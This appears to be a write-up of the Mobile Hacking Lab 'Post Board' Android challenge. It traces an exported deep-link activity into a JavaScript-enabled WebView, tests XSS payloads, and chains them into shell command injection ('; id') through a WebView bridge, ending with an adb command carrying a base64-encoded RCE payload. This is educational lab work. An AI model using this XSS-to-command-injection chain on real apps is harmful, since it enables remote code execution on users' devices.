Post Board

Hello everyone , In this blog post , I will try to explain my solution steps for Post Board challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

  1. After we install The APK then we open it its a message application with an input field

    image.png
  2. Let’s Examine the AndroidManifest.xml we found that activity com.mobilehackinglab.postboard.MainActivity , it’s an exported activity

    1. have a data schema with scheme= postboard and android:host= postmessage with a category BROWSABLE

  3. let’s analysis this main activity code :

    1. First thing we find is setupView() that have :

      1. setJavaScriptEnabled(**true**)

      2. path that load the url file:///android_asset/index.html

    2. the second thing is handleIntent()

      1. Verifies if the intent’s URI scheme is postboard and the host is postmessage.

      2. Decodes a Base64-encoded path in the URI, escapes certain characters, and passes it to JavaScript via WebAppInterface.postMarkdownMessage to display it on the home page.

  4. Let’s try to test our input :

    1. First payload is <h1>kero</h1> ⇒ already success

    2. the second payload is <img src=x onerror=alert(1)> ⇒ success

  5. when we analysis the WebAppInterface class we found this Func postCowsayMessage()

    1. it execute the cowsay script located at CowsayUtil.scriptPath

    2. passing the message arg as {"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}

      1. it use a shell , then call the message + script path

      2. may be we can call the postCowsayMessage and then pass whoami as a cowsayMessage

      3. then it will be passed to runCowsay and then exec it by :

        1. my payload is <img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")> let’s encode it and put it with adb

      adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/

      PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"

  6. and here we success and already get rce 😉

Last updated